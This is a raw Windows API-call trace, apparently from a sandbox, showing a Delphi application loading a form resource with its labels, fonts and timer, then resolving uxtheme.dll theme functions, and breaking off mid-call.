0xc04 [0039.625] GetCurrentThreadId () returned 0xc04 [0039.625] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x68ff808, fWinIni=0x0 | out: pvParam=0x68ff808) returned 1 [0039.626] IsWindowVisible (hWnd=0x70144) returned 0 [0039.626] GetCurrentThreadId () returned 0xc04 [0039.626] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6dba33d, cbMultiByte=10, lpWideCharStr=0x71dfdbc, cchWideChar=11 | out: lpWideCharStr="TFrmMwM41n") returned 10 [0039.626] VirtualQuery (in: lpAddress=0x6db9e80, lpBuffer=0x68ff7cc, dwLength=0x1c | out: lpBuffer=0x68ff7cc*(BaseAddress=0x6db9000, AllocationBase=0x6ba0000, AllocationProtect=0x4, RegionSize=0x36000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c [0039.626] FindResourceW (hModule=0x6ba0000, lpName="TFrmMwM41n", lpType=0xa) returned 0x6e2ea90 [0039.626] FindResourceW (hModule=0x6ba0000, lpName="TFrmMwM41n", lpType=0xa) returned 0x6e2ea90 [0039.626] LoadResource (hModule=0x6ba0000, hResInfo=0x6e2ea90) returned 0x6e3a9ec [0039.626] SizeofResource (hModule=0x6ba0000, hResInfo=0x6e2ea90) returned 0x71c [0039.626] LockResource (hResData=0x6e3a9ec) returned 0x6e3a9ec [0039.627] GetCurrentThreadId () returned 0xc04 [0039.627] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x68ff6d8 | out: lpCPInfo=0x68ff6d8) returned 1 [0039.627] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1590, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0039.627] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1590, cbMultiByte=10, lpWideCharStr=0x71ca138, cchWideChar=10 | out: lpWideCharStr="TFrmMwM41n") returned 10 [0039.627] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1590, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0039.627] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1590, cbMultiByte=9, lpWideCharStr=0x71ca138, cchWideChar=9 | out: lpWideCharStr="FrmMwM41nn") returned 9 [0039.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff5f1, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0039.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FrmMwM41n", cchWideChar=9, lpMultiByteStr=0x68ff5f1, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FrmMwM41nQu\x90\x15\x1d\x07\x09", lpUsedDefaultChar=0x0) returned 9 [0039.627] GetCurrentThreadId () returned 0xc04 [0039.627] GetCurrentThreadId () returned 0xc04 [0039.627] GetCurrentThreadId () returned 0xc04 [0039.627] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d84d8, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0039.627] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d84d8, cbMultiByte=4, lpWideCharStr=0x71d15c0, cchWideChar=4 | out: lpWideCharStr="Left") returned 4 [0039.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x71ca17c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Left", lpUsedDefaultChar=0x0) returned 4 [0039.627] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x68ff570, fWinIni=0x0 | out: pvParam=0x68ff570) returned 1 [0039.627] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d84d8, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0039.627] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d84d8, cbMultiByte=3, lpWideCharStr=0x71d15c0, cchWideChar=3 | out: lpWideCharStr="Topt") returned 3 [0039.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x71ca15c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0039.627] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x68ff570, fWinIni=0x0 | out: pvParam=0x68ff570) returned 1 [0039.628] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15d8, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.628] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15d8, cbMultiByte=7, lpWideCharStr=0x71ca158, cchWideChar=7 | out: lpWideCharStr="Caption") returned 7 [0039.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Caption", cchWideChar=7, lpMultiByteStr=0x71dfeac, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Caption", lpUsedDefaultChar=0x0) returned 7 [0039.628] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x71d15c0, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0039.628] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x71d15c0, cbMultiByte=9, lpWideCharStr=0x71ca178, cchWideChar=9 | out: lpWideCharStr="FrmMwM41n") returned 9 [0039.628] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0039.628] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=12, lpWideCharStr=0x71dfea8, cchWideChar=12 | out: lpWideCharStr="ClientHeight") returned 12 [0039.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ClientHeight", cchWideChar=12, lpMultiByteStr=0x71fc454, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ClientHeight", lpUsedDefaultChar=0x0) returned 12 [0039.628] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0039.628] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=11, lpWideCharStr=0x71dfea8, cchWideChar=11 | out: lpWideCharStr="ClientWidtht") returned 11 [0039.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ClientWidth", cchWideChar=11, lpMultiByteStr=0x71fc454, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ClientWidtht", lpUsedDefaultChar=0x0) returned 11 [0039.628] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=5, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0039.628] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=5, lpWideCharStr=0x71d15d8, cchWideChar=5 | out: lpWideCharStr="Color") returned 5 [0039.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Color", cchWideChar=5, lpMultiByteStr=0x71ca19c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Color", lpUsedDefaultChar=0x0) returned 5 [0039.628] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0039.628] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=9, lpWideCharStr=0x71ca198, cchWideChar=9 | out: lpWideCharStr="clBtnFace") returned 9 [0039.628] GetCurrentThreadId () returned 0xc04 [0039.628] GetCurrentThreadId () returned 0xc04 [0039.628] GetCurrentThreadId () returned 0xc04 [0039.628] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0039.628] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=12, lpWideCharStr=0x71dfea8, cchWideChar=12 | out: lpWideCharStr="Font.Charseth") returned 12 [0039.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Font", cchWideChar=4, lpMultiByteStr=0x71ca13c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Fontl", lpUsedDefaultChar=0x0) returned 4 [0039.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Charset", cchWideChar=7, lpMultiByteStr=0x71dfeac, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Charset", lpUsedDefaultChar=0x0) returned 7 [0039.629] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca158, cbMultiByte=15, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 15 [0039.629] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca158, cbMultiByte=15, lpWideCharStr=0x71e6c68, cchWideChar=15 | out: lpWideCharStr="DEFAULT_CHARSET") returned 15 [0039.629] GetCurrentThreadId () returned 0xc04 [0039.629] GetCurrentThreadId () returned 0xc04 [0039.629] GetCurrentThreadId () returned 0xc04 [0039.629] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0039.629] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=10, lpWideCharStr=0x71ca158, cchWideChar=10 | out: lpWideCharStr="Font.Color馰ܜ\x18") returned 10 [0039.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Font", cchWideChar=4, lpMultiByteStr=0x71ca13c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Fonta", lpUsedDefaultChar=0x0) returned 4 [0039.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Color", cchWideChar=5, lpMultiByteStr=0x71ca15c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Color", lpUsedDefaultChar=0x0) returned 5 [0039.629] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0039.629] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=12, lpWideCharStr=0x71dfed0, cchWideChar=12 | out: lpWideCharStr="clWindowTexth") returned 12 [0039.629] GetCurrentThreadId () returned 0xc04 [0039.629] GetCurrentThreadId () returned 0xc04 [0039.629] GetCurrentThreadId () returned 0xc04 [0039.629] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0039.629] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=11, lpWideCharStr=0x71dfea8, cchWideChar=11 | out: lpWideCharStr="Font.Heightr") returned 11 [0039.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Font", cchWideChar=4, lpMultiByteStr=0x71ca13c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Fontl", lpUsedDefaultChar=0x0) returned 4 [0039.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Height", cchWideChar=6, lpMultiByteStr=0x71dfeac, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HeightH", lpUsedDefaultChar=0x0) returned 6 [0039.629] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0039.629] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=9, lpWideCharStr=0x71ca158, cchWideChar=9 | out: lpWideCharStr="Font.Name") returned 9 [0039.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Font", cchWideChar=4, lpMultiByteStr=0x71ca13c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Fonti", lpUsedDefaultChar=0x0) returned 4 [0039.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Name", cchWideChar=4, lpMultiByteStr=0x71ca15c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Namen", lpUsedDefaultChar=0x0) returned 4 [0039.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x71d15c0, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x71d15c0, cbMultiByte=6, lpWideCharStr=0x71d15d8, cchWideChar=6 | out: lpWideCharStr="Tahoma") returned 6 [0039.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tahoma", cchWideChar=6, lpMultiByteStr=0x68ff3b9, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tahoma", lpUsedDefaultChar=0x0) returned 6 [0039.630] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0039.630] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=10, lpWideCharStr=0x71ca158, cchWideChar=10 | out: lpWideCharStr="Font.Style馰ܜ\x18") returned 10 [0039.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Font", cchWideChar=4, lpMultiByteStr=0x71ca13c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Fontm", lpUsedDefaultChar=0x0) returned 4 [0039.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Style", cchWideChar=5, lpMultiByteStr=0x71ca15c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Style", lpUsedDefaultChar=0x0) returned 5 [0039.630] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0039.630] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0039.630] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca158, cbMultiByte=14, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0039.630] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca158, cbMultiByte=14, lpWideCharStr=0x71dfed0, cchWideChar=14 | out: lpWideCharStr="OldCreateOrder") returned 14 [0039.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OldCreateOrder", cchWideChar=14, lpMultiByteStr=0x7211e7c, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OldCreateOrder", lpUsedDefaultChar=0x0) returned 14 [0039.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="False", cchWideChar=5, lpMultiByteStr=0x71ca15c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FalseOrdery", lpUsedDefaultChar=0x0) returned 5 [0039.630] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0039.630] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=8, lpWideCharStr=0x71ca138, cchWideChar=8 | out: lpWideCharStr="Position") returned 8 [0039.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Position", cchWideChar=8, lpMultiByteStr=0x71e6ccc, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Positionr", lpUsedDefaultChar=0x0) returned 8 [0039.630] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0039.630] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=10, lpWideCharStr=0x71ca138, cchWideChar=10 | out: lpWideCharStr="poDesignedꆑܜ\xfde9\x01") returned 10 [0039.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="poDesigned", cchWideChar=10, lpMultiByteStr=0x71e6ccc, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="poDesignede", lpUsedDefaultChar=0x0) returned 10 [0039.630] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0039.630] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=8, lpWideCharStr=0x71ca138, cchWideChar=8 | out: lpWideCharStr="OnCreateedꆑܜ\xfde9\x01") returned 8 [0039.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnCreate", cchWideChar=8, lpMultiByteStr=0x71e6ccc, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnCreateed", lpUsedDefaultChar=0x0) returned 8 [0039.630] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0039.630] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=10, lpWideCharStr=0x71ca138, cchWideChar=10 | out: lpWideCharStr="FormCreateꆑܜ\xfde9\x01") returned 10 [0039.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FormCreate", cchWideChar=10, lpMultiByteStr=0x68ff4c5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FormCreate\x07\n", lpUsedDefaultChar=0x0) returned 10 [0039.631] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca138, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0039.631] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca138, cbMultiByte=13, lpWideCharStr=0x71dfed0, cchWideChar=13 | out: lpWideCharStr="PixelsPerInchrܝҰ\x02\x01") returned 13 [0039.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PixelsPerInch", cchWideChar=13, lpMultiByteStr=0x71fc454, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PixelsPerInch", lpUsedDefaultChar=0x0) returned 13 [0039.631] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0039.631] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=10, lpWideCharStr=0x71ca138, cchWideChar=10 | out: lpWideCharStr="TextHeightꆑܜ\xfde9\x01") returned 10 [0039.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TextHeight", cchWideChar=10, lpMultiByteStr=0x71e6c9c, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TextHeights", lpUsedDefaultChar=0x0) returned 10 [0039.631] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.631] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=6, lpWideCharStr=0x71d15d8, cchWideChar=6 | out: lpWideCharStr="TLabel") returned 6 [0039.631] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.631] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d15c0, cbMultiByte=6, lpWideCharStr=0x71d15d8, cchWideChar=6 | out: lpWideCharStr="Label1") returned 6 [0039.631] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6cb99c5, cbMultiByte=6, lpWideCharStr=0x71ca19c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0039.631] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TLabel", cchCount2=6) returned 3 [0039.631] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6ca4767, cbMultiByte=6, lpWideCharStr=0x71ca19c, cchWideChar=7 | out: lpWideCharStr="TLabel") returned 6 [0039.631] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TLabel", cchCount1=6, lpString2="TLabel", cchCount2=6) returned 2 [0039.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff499, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¡\x1c\x07\x07", lpUsedDefaultChar=0x0) returned 0 [0039.632] GetCurrentThreadId () returned 0xc04 [0039.632] GetCurrentThreadId () returned 0xc04 [0039.632] GetCurrentThreadId () returned 0xc04 [0039.632] LoadLibraryW (lpLibFileName="uxtheme.dll") returned 0x74090000 [0039.633] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OpenThemeData", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0039.633] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OpenThemeData", cchWideChar=13, lpMultiByteStr=0x71ca1dc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OpenThemeData", lpUsedDefaultChar=0x0) returned 13 [0039.633] GetProcAddress (hModule=0x74090000, lpProcName="OpenThemeData") returned 0x740973d2 [0039.633] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CloseThemeData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0039.633] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CloseThemeData", cchWideChar=14, lpMultiByteStr=0x71ca1dc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseThemeData", lpUsedDefaultChar=0x0) returned 14 [0039.634] GetProcAddress (hModule=0x74090000, lpProcName="CloseThemeData") returned 0x74096a18 [0039.634] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeBackground", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0039.634] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeBackground", cchWideChar=19, lpMultiByteStr=0x71dff9c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DrawThemeBackground", lpUsedDefaultChar=0x0) returned 19 [0039.634] GetProcAddress (hModule=0x74090000, lpProcName="DrawThemeBackground") returned 0x74093982 [0039.634] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeText", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0039.635] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeText", cchWideChar=13, lpMultiByteStr=0x71ca1dc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DrawThemeText", lpUsedDefaultChar=0x0) returned 13 [0039.635] GetProcAddress (hModule=0x74090000, lpProcName="DrawThemeText") returned 0x74094ea1 [0039.635] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeBackgroundContentRect", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0039.635] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeBackgroundContentRect", cchWideChar=29, lpMultiByteStr=0x71e6c6c, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeBackgroundContentRect", lpUsedDefaultChar=0x0) returned 29 [0039.636] GetProcAddress (hModule=0x74090000, lpProcName="GetThemeBackgroundContentRect") returned 0x7409cd2e [0039.636] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeBackgroundExtent", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0039.636] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeBackgroundExtent", cchWideChar=24, lpMultiByteStr=0x71e6c6c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeBackgroundExtent", lpUsedDefaultChar=0x0) returned 24 [0039.636] GetProcAddress (hModule=0x74090000, lpProcName="GetThemeBackgroundExtent") returned 0x7409f8bf [0039.636] WideCharToMultiByte (in: CodePage=0x4e4, 